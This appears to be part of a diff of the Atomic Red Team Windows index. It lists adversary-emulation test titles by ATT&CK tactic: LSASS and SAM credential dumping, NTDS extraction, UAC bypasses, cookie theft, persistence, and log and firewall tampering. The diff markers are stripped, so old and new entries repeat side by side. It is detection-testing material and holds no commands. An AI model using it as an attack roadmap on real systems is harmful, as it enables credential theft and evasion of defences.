- Atomic Test #1: Input Capture [windows]
- [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.004 Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
@@ -203,12 +15,10 @@
- Atomic Test #1: Process Injection via C# [windows]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -216,83 +26,61 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
@@ -300,63 +88,54 @@
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -364,16 +143,6 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -381,15 +150,10 @@
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
@@ -401,18 +165,16 @@
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
@@ -421,13 +183,8 @@
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- Atomic Test #5: Disable Event Logging with wevtutil [windows]
- Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
